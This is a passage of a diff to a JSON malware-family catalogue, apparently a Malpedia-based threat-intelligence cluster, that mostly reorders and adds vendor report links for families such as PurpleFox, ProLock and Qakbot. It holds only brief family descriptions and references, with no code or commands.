"https://exchange.xforce.ibmcloud.com/collection/99c7156cff70e1d8e1687ab7dadc8c0e" + "https://www.intezer.com/blog-purelocker-ransomware-being-used-in-targeted-attacks-against-servers/" ], "synonyms": [], "type": [] @@ -39093,24 +40902,27 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplefox", - "https://blog.malwarebytes.com/trojans/2021/03/perkiler-malware-turns-to-smb-brute-force-to-spread/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal/IOCs-Purple-Fox.txt", + "https://www.thecybersecuritytimes.com/purple-fox-malware-is-actively-distributed-via-telegram-installers/", + "https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/security-101-the-impact-of-cryptocurrency-mining-malware", + "https://www.proofpoint.com/us/blog/threat-insight/chinese-malware-appears-earnest-across-cybercrime-threat-landscape", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal/Technical%20Brief%20-%20A%20Look%20Into%20Purple%20Fox%E2%80%99s%20New%20Arrival%20Vector.pdf", - "https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html", - "https://twitter.com/C0rk1_H/status/1412801973628272641?s=20", - "https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/", "https://nao-sec.org/2021/04/exploit-kit-still-sharpens-a-sword.html", + "https://threatresearch.ext.hp.com/purple-fox-exploit-kit-now-exploits-cve-2021-26411/", + "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html", "https://blog.minerva-labs.com/malicious-telegram-installer-drops-purple-fox-rootkit", "https://www.trendmicro.com/en_us/research/21/l/a-look-into-purple-fox-server-infrastructure.html", - "https://www.trendmicro.com/en_in/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/security-101-the-impact-of-cryptocurrency-mining-malware", - "https://www.trendmicro.com/en_us/research/21/g/purplefox-using-wpad-to-targent-indonesian-users.html", - "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal/IOCs-Purple-Fox.txt", - "https://www.guardicore.com/labs/purple-fox-rootkit-now-propagates-as-a-worm/", + "https://labs.sentinelone.com/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/", "https://s.tencent.com/research/report/1322.html", - "https://www.thecybersecuritytimes.com/purple-fox-malware-is-actively-distributed-via-telegram-installers/", - "https://threatresearch.ext.hp.com/purple-fox-exploit-kit-now-exploits-cve-2021-26411/", - "https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit" + "https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit", + "https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/", + "https://www.guardicore.com/labs/purple-fox-rootkit-now-propagates-as-a-worm/", + "https://twitter.com/C0rk1_H/status/1412801973628272641?s=20", + "https://www.trendmicro.com/en_in/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html", + "https://blog.malwarebytes.com/trojans/2021/03/perkiler-malware-turns-to-smb-brute-force-to-spread/", + "https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html", + "https://www.trendmicro.com/en_us/research/21/g/purplefox-using-wpad-to-targent-indonesian-users.html" ], "synonyms": [], "type": [] @@ -39119,7 +40931,7 @@ "value": "PurpleFox" }, { - "description": "ZScaler reported on a new Infostealer called PurpleWave, which is written in C++ and silently installs itself onto a user’s system. It connects to a command and control (C&C) server to send system information and installs new malware onto the infected system.\r\n\r\nThe author of this malware is advertising and selling PurpleWave stealer on Russian cybercrime forums for 5,000 RUB (US$68) with lifetime updates and 4,000 RUB (US$54) with only two updates.", + "description": "ZScaler reported on a new Infostealer called PurpleWave, which is written in C++ and silently installs itself onto a user\u2019s system. It connects to a command and control (C&C) server to send system information and installs new malware onto the infected system.\r\n\r\nThe author of this malware is advertising and selling PurpleWave stealer on Russian cybercrime forums for 5,000 RUB (US$68) with lifetime updates and 4,000 RUB (US$54) with only two updates.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplewave", @@ -39136,14 +40948,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "http://www.secureworks.com/research/threat-profiles/gold-essex", - "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf", - "https://www.secureworks.com/research/pushdo", - "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", - "http://malware-traffic-analysis.net/2017/04/03/index2.html", + "https://www.secureworks.com/research/threat-profiles/gold-essex", "https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/", - "https://www.secureworks.com/research/threat-profiles/gold-essex" + "http://malware-traffic-analysis.net/2017/04/03/index2.html", + "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", + "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.secureworks.com/research/pushdo" ], "synonyms": [], "type": [] @@ -39194,32 +41006,32 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwndlocker", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://www.group-ib.com/blog/prolock_evolution", - "https://www.bleepingcomputer.com/news/security/new-pwndlocker-ransomware-targeting-us-cities-enterprises/", - "https://id-ransomware.blogspot.com/2019/10/pwndlocker-ransomware.html", "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://www.group-ib.com/blog/prolock_evolution", + "https://news.sophos.com/en-us/2020/07/27/prolock-ransomware-gives-you-the-first-8-kilobytes-of-decryption-for-free/", + "https://www.intrinsec.com/egregor-prolock/", + "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", + "https://www.it-klinika.rs/blog/paznja-novi-opasni-ransomware-pwndlocker-i-u-srbiji", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://soolidsnake.github.io/2020/05/11/Prolock_ransomware.html", "https://www.group-ib.com/blog/prolock", "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", - "https://soolidsnake.github.io/2020/05/11/Prolock_ransomware.html", - "https://www.intrinsec.com/egregor-prolock/", - "https://www.zdnet.com/article/fbi-prolock-ransomware-gains-access-to-victim-networks-via-qakbot-infections/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/", - "https://news.sophos.com/en-us/2020/07/27/prolock-ransomware-gives-you-the-first-8-kilobytes-of-decryption-for-free/", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://www.it-klinika.rs/blog/paznja-novi-opasni-ransomware-pwndlocker-i-u-srbiji", - "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/", - "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf", "https://www.bleepingcomputer.com/news/security/pwndlocker-ransomware-gets-pwned-decryption-now-available/", "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/", - "https://www.cert-pa.it/notizie/pwndlocker-si-rinnova-in-prolock-ransomware/" + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://id-ransomware.blogspot.com/2019/10/pwndlocker-ransomware.html", + "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf", + "https://www.bleepingcomputer.com/news/security/new-pwndlocker-ransomware-targeting-us-cities-enterprises/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf", + "https://www.cert-pa.it/notizie/pwndlocker-si-rinnova-in-prolock-ransomware/", + "https://www.zdnet.com/article/fbi-prolock-ransomware-gains-access-to-victim-networks-via-qakbot-infections/", + "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [ "ProLock" @@ -39234,10 +41046,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos", - "https://twitter.com/physicaldrive0/status/573109512145649664", - "https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/pwnpos-old-undetected-pos-malware-still-causing-havoc/", - "https://www.brimorlabsblog.com/2015/03/and-you-get-pos-malware-nameand-you-get.html" + "https://www.brimorlabsblog.com/2015/03/and-you-get-pos-malware-nameand-you-get.html", + "https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf", + "https://twitter.com/physicaldrive0/status/573109512145649664" ], "synonyms": [], "type": [] @@ -39245,6 +41057,19 @@ "uuid": "c903627c-90f6-44ee-9750-4bb44bdbceab", "value": "pwnpos" }, + { + "description": "Information stealer, based on strings it seems to target crypto currencies, instant messengers, and browser data.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pxrecvoweiwoei", + "https://twitter.com/suyog41/status/1688797716447432704" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ac22ee6f-0d15-4edb-8ea5-1675df57597c", + "value": "PXRECVOWEIWOEI" + }, { "description": "Py2exe built worm propagating via USB drives, having wiper features embedded in the logic (based on today's date being later than 2016-04-03 and existence of a file C:\\txt.txt)", "meta": { @@ -39264,12 +41089,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa", - "https://bin.re/blog/pykspas-inferior-dga-version/", - "https://www.youtube.com/watch?v=HfSQlC76_s4", "https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/", - "https://blogs.akamai.com/sitr/2019/07/pykspa-v2-dga-updated-to-become-selective.html", + "https://www.youtube.com/watch?v=HfSQlC76_s4", "https://bin.re/blog/the-dga-of-pykspa/", - "https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/" + "https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/", + "https://blogs.akamai.com/sitr/2019/07/pykspa-v2-dga-updated-to-become-selective.html", + "https://bin.re/blog/pykspas-inferior-dga-version/" ], "synonyms": [], "type": [] @@ -39282,14 +41107,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky", - "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/", - "https://www.bleepingcomputer.com/news/security/pylocky-decryptor-released-by-french-authorities/", + "https://blog.talosintelligence.com/2019/01/pylocky-unlocked-cisco-talos-releases.html", "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/", "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", + "https://www.bleepingcomputer.com/news/security/pylocky-decryptor-released-by-french-authorities/", + "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/", "https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/", - "https://blog.talosintelligence.com/2019/01/pylocky-unlocked-cisco-talos-releases.html", "https://www.cybermalveillance.gouv.fr/nos-articles/outil-dechiffrement-rancongiciel-ransomware-pylocky-v1-2/", - "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/" + "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/" ], "synonyms": [ "Locky Locker" @@ -39304,19 +41129,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pyxie", - "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.ic3.gov/Media/News/2021/211101.pdf", - "https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/", - "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/", + "https://www.ic3.gov/Media/News/2021/211101.pdf", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/", - "https://www.secureworks.com/research/threat-profiles/gold-dupont", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://www.secureworks.com/research/threat-profiles/gold-dupont", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3", "https://threatvector.cylance.com/en_us/home/meet-pyxie-a-nefarious-new-python-rat.html", - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx" + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [ "PyXie RAT" @@ -39344,12 +41169,12 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars", "https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan", - "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", - "https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/", - "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/", - "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/" + "https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/", + "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/", + "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/" ], "synonyms": [], "type": [] @@ -39362,219 +41187,246 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot", - "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", - "https://www.bleepingcomputer.com/news/security/qbot-needs-only-30-minutes-to-steal-your-credentials-emails/", - "https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html", - "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html", - "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike", - "https://www.0ffset.net/reverse-engineering/malware-analysis/qakbot-browser-hooking-p1/", - "https://twitter.com/elisalem9/status/1381859965875462144", - "https://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques", - "https://documents.trendmicro.com/assets/pdf/Technical-Brief---The-Prelude-to-Ransomware-A-Look-into-Current-QAKBOT-Capabilities-and-Activity.pdf", - "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/demystifying-qbot-malware.html", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://isc.sans.edu/diary/rss/28568", - "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/", - "https://www.splunk.com/en_us/blog/security/from-macros-to-no-macros-continuous-malware-improvements-by-qakbot.html", - "https://medium.com/walmartglobaltech/qbot-testing-malvertising-campaigns-3e2552cbc69a", - "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf", - "https://blog.morphisec.com/qakbot-qbot-maldoc-two-new-techniques", - "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", - "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/", - "https://twitter.com/tylabs/status/1462195377277476871", - "https://www.cybereason.com/blog/threat-alert-aggressive-qakbot-campaign-and-the-black-basta-ransomware-group-targeting-u.s.-companies", - "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus", - "https://www.malwarology.com/2022/04/qakbot-series-configuration-extraction/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.dsih.fr/article/5020/comment-qbot-revient-en-force-avec-onenote.html", - "https://securityintelligence.com/news/qbot-malware-using-windows-defender-antivirus-lure/", "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html", - "https://blog.group-ib.com/prometheus-tds", - "https://www.trendmicro.com/en_us/research/22/e/bruised-but-not-broken--the-resurgence-of-the-emotet-botnet-malw.html", - "https://blog.minerva-labs.com/a-new-datoploader-delivers-qakbot-trojan", - "https://blogs.vmware.com/security/2021/11/telemetry-peak-analyzer-an-automatic-malware-campaign-detector.html", - "https://www.youtube.com/watch?v=OCRyEUhiEyw", - "https://www.elastic.co/security-labs/qbot-configuration-extractor", - "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise", - "https://isc.sans.edu/diary/rss/28728", - "https://www.silentpush.com/blog/malicious-infrastructure-as-a-service", - "http://contagiodump.blogspot.com/2010/11/template.html", - "https://syrion.me/malware/qakbot-bb-extractor/", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://quosecgmbh.github.io/blog/grap_qakbot_navigation.html", - "https://twitter.com/embee_research/status/1592067841154756610?s=20", - "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", - "https://docs.velociraptor.app/blog/2023/2023-04-05-qakbot/", - "https://www.malwarology.com/2022/04/qakbot-series-process-injection/", - "https://madlabs.dsu.edu/madrid/blog/2021/04/30/qbot-analyzing-php-proxy-scripts-from-compromised-web-server/", - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta", - "https://unit42.paloaltonetworks.com/tutorial-qakbot-infection/", - "https://www.malwarology.com/2022/04/qakbot-series-api-hashing/", - "https://www.f5.com/labs/articles/threat-intelligence/qbot-banking-trojan-still-up-to-its-old-tricks", - "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", - "https://www.malwarology.com/posts/2-qakbot-conf-extraction/", - "https://www.reliaquest.com/blog/qbot-black-basta-ransomware/", - "https://www.malwarology.com/posts/1-qakbot-strings-obfuscation/", - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://www.secureworks.com/research/threat-profiles/gold-lagoon", - "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", - "https://www.trendmicro.com/en_us/research/21/l/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html", - "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", - "https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/", - "https://research.loginsoft.com/threat-research/blog-maximizing-threat-detections-of-qakbot-with-osquery/", - "https://www.youtube.com/watch?v=M22c1JgpG-U", - "https://experience.mandiant.com/trending-evil/p/1", - "https://www.trellix.com/en-us/about/newsroom/stories/research/qakbot-evolves-to-onenote-malware-distribution.html", - "https://www.bleepingcomputer.com/news/security/qbot-malware-switches-to-new-windows-installer-infection-vector/", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://github.com/binref/refinery/blob/master/tutorials/tbr-files.v0x06.Qakbot.Decoder.ipynb", - "https://isc.sans.edu/forums/diary/XLSB+Files+Because+Binary+is+Stealthier+Than+XML/28476/", - "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", - "https://www.atomicmatryoshka.com/post/malware-headliners-qakbot", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", - "https://www.malwarology.com/2022/04/qakbot-series-string-obfuscation/", - "https://research.checkpoint.com/2020/exploring-qbots-latest-attack-methods/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/decrypting-qakbots-encrypted-registry-keys/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html", - "https://www.trendmicro.com/en_us/research/21/k/qakbot-loader-returns-with-new-techniques-and-tools.html", - "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks", - "https://quosecgmbh.github.io/blog/grap_qakbot_strings.html", - "https://twitter.com/Corvid_Cyber/status/1455844008081641472", - "https://blog.reversinglabs.com/blog/spotting-malicious-excel4-macros", - "https://socprime.com/blog/qbot-malware-detection-old-dog-new-tricks/", - "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/", - "https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/", - "https://raw.githubusercontent.com/NtQuerySystemInformation/Malware-RE-papers/main/Qakbot%20report.pdf", - "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/", - "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", - "https://twitter.com/_alex_il_/status/1384094623270727685", - "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", - "https://twitter.com/TheDFIRReport/status/1361331598344478727", - "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/", - "https://bin.re/blog/the-dga-of-qakbot/", - "https://isc.sans.edu/diary/rss/28448", - "https://redcanary.com/blog/intelligence-insights-november-2021/", - "https://www.elastic.co/security-labs/qbot-malware-analysis", - "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", - "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-countermeasures/", - "https://www.elastic.co/de/security-labs/qbot-malware-analysis", - "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot", - "https://twitter.com/Unit42_Intel/status/1461004489234829320", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf", - "https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html", - "https://www.bleepingcomputer.com/news/security/qbot-phishing-uses-windows-calculator-sideloading-to-infect-devices/", - "https://www.youtube.com/watch?v=iB1psRMtlqg", - "https://twitter.com/kienbigmummy/status/1460537501676802051", - "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/", - "https://drive.google.com/file/d/1mO2Zb-Q94t39DvdASd4KNTPBD8JdkyC3/view", - "https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot", - "https://www.tidalcyber.com/blog/identifying-and-defending-against-qakbots-evolving-ttps", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", - "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", - "https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/", - "https://twitter.com/embee_research/status/1592067841154756610?s=20&t=hEALPAWr1LIt9pXcVpxjRQ", - "https://www.bitsight.com/blog/emotet-botnet-rises-again", - "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", - "https://perception-point.io/insights-into-an-excel-4-0-macro-attack-using-qakbot-malware", + "https://securityintelligence.com/news/qbot-malware-using-windows-defender-antivirus-lure/", "http://www.secureworks.com/research/threat-profiles/gold-lagoon", - "https://redcanary.com/blog/intelligence-insights-december-2021", - "https://blog.talosintelligence.com/following-the-lnk-metadata-trail", - "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot", - "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis", - "https://n1ght-w0lf.github.io/malware%20analysis/qbot-banking-trojan/", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://news.sophos.com/en-us/2022/03/10/qakbot-injects-itself-into-the-middle-of-your-conversations/", - "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf", - "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html", - "https://www.group-ib.com/blog/egregor", - "https://blog.talosintelligence.com/2016/04/qbot-on-the-rise.html", - "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", - "https://blog.cyble.com/2023/02/17/the-many-faces-of-qakbot-malware-a-look-at-its-diverse-distribution-methods/", - "https://www.netresec.com/?page=Blog&month=2023-03&post=QakBot-C2-Traffic", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", - "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7", - "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf", - "https://www.securityhomework.net/articles/qakbot_ccs_prioritization_and_new_record_types/qakbot_ccs_prioritization_and_new_record_types.php", - 